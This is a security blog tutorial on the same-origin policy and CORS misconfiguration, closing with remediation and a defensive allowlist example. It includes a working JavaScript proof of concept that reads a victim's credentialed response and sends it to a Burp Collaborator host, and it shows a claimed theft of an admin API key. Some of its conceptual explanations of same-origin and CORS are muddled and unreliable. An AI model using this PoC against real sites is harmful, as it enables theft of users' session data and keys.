With a real-world example:


To understand CORS, we first need to learn about same-origin.

When we browse any application, the application server fetches data such as images and web pages from different locations on the same server, or from a different server on the internet. To make this fetching secure, the server implements the “same-origin policy”.

Same Origin Policy: If the server sets this, it can fetch data only from the servers it has whitelisted in its same-origin policy; if it tries to fetch data from a domain that is not whitelisted, the request will not succeed.

What do we mean by same-origin?

It is a combination of three parts.

· Port

· Protocol

· Host

So if A wants some data from B, then A and B must have the same port (80), host (example.com) and protocol (http/https). When these three parts match, fetching can succeed under the same-origin policy.

So after implementing it we achieve security, but developers or application admins find it very restrictive when performing tasks on the web application, because whitelisting each and every URL from which you want to fetch data is a hectic task. Therefore, to remove that restriction we can use CORS, through which we specify the domains with which we share data or from which we fetch it.

Cross-Origin Resource Sharing (CORS): Requesting any resource from outside its own origin is known as CORS.

It provides a relaxation of the same-origin policy that is specified on the server. To implement CORS we need to send some headers from the web page on which we want to fetch data from other resources.

The implementation of CORS depends on many things, such as the framework and the language.

CORS headers

· Access-Control-Allow-Origin (ACAO): Here we specify which domains are allowed to fetch the data. Sometimes we see ‘*’, which means the CORS-enabled server will accept requests for data from any domain instead of only whitelisted ones.

· Access-Control-Allow-Methods: Here we specify which HTTP methods, such as GET, POST and OPTIONS, may be used to access those resources. Sometimes the server processes a modified method in the request, which is not safe for the server.

Advantage

· Resources over infrastructure can be shared easily.

· No need to create duplicate resources over the network, because some connections from one host to another are certainly desired.

Disadvantage

If it is set very loosely, any domain the user visits can fetch the data of the parent domain.

Implement CORS only in special cases, and the configuration should be restrictive.

Working:


· Initially the attacker sets up a domain where he/she can capture the legitimate user's response and fetch sensitive information from the website that is vulnerable to CORS.

· Now user logs into the CORS vulnerable application.

· As soon as the legitimate user visits the attacker-controlled domain, his sensitive data such as API keys and emails will be stolen.

· Using the information captured on his domain, the attacker fetches sensitive data of the legitimate user.

Exploitation: The application is vulnerable to CORS and we have to fetch the API key of the user.

So after logging into the application and intercepting the request, we saw in the response that “Access-Control-Allow-Credentials” is set to true.


In the request, I added an “Origin” header with a random domain to check whether it is vulnerable to CORS or not. If that domain is reflected in the response, it means CORS exists there.


And the same domain that we entered in the request header was reflected in the response header.

We will use the below PoC to exploit this vulnerability.

<script>

// Cross-origin request to the vulnerable endpoint; withCredentials makes
// the browser attach the victim's session cookies to it.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('GET', '<CORS vulnerable application link>', true);
req.withCredentials = true;
req.send();

// Once the response arrives, its body is forwarded to the Collaborator listener.
function reqListener() {
  location = '<Give burp collaborator client address>/log?key=' + this.responseText;
}

</script>

As we already know the CORS-vulnerable endpoint, we paste it in place of <CORS vulnerable application link> and use the Burp Collaborator URL from Burp, i.e. https://0efqlclec4hdtuqyvoc4odd80z6pue.burpcollaborator.net/

So after entering the vulnerable URL and the Burp Collaborator address, the updated PoC:


After decoding the body of the above request:


Now forward the request and check the burp collaborator client.


We can see that we have successfully fetched the API_key of the admin.

Remediation

· Whitelist the allowed domains for Access-Control-Allow-Origin.

· Avoid setting ‘*’ in Access-Control-Allow-Origin.
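To make the CORS headers section and the remediation above concrete, here is an added example (not code from the original post): a server-side decision function that reflects the request Origin, as the vulnerable application did, placed beside an allowlist-based version, plus the check a defender can run on a captured response. The origins in the allowlist are constructed sample values.

```javascript
// Added example, not from the original post. Origin values are constructed.

// Vulnerable pattern: echo whatever Origin the browser sent and also allow
// credentials, so any site the logged-in user visits can read the response.
function reflectingCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Remediated pattern: compare the full origin (scheme + host + port) against
// an explicit allowlist and only then allow credentials. Exact matching
// avoids the substring and suffix mistakes ("endsWith('example.com')") that
// would also accept look-alike hosts. Unknown origins get no CORS headers,
// so the browser blocks the cross-origin read.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',   // constructed sample values
  'https://admin.example.com',
]);

function allowlistCorsHeaders(requestOrigin, allowed = ALLOWED_ORIGINS) {
  if (!requestOrigin || !allowed.has(requestOrigin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    // Per-origin responses must not be served from a shared cache entry.
    'Vary': 'Origin',
  };
}

// Defender's check on a captured request/response pair: a reflected
// arbitrary Origin together with Allow-Credentials: true is exactly the
// signal the post found in Burp.
function isReflectedWithCredentials(requestOrigin, responseHeaders) {
  return responseHeaders['Access-Control-Allow-Origin'] === requestOrigin &&
    responseHeaders['Access-Control-Allow-Credentials'] === 'true';
}
```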

Written by

Security enthusiast working to secure web for others https://twitter.com/BoredSecEngg
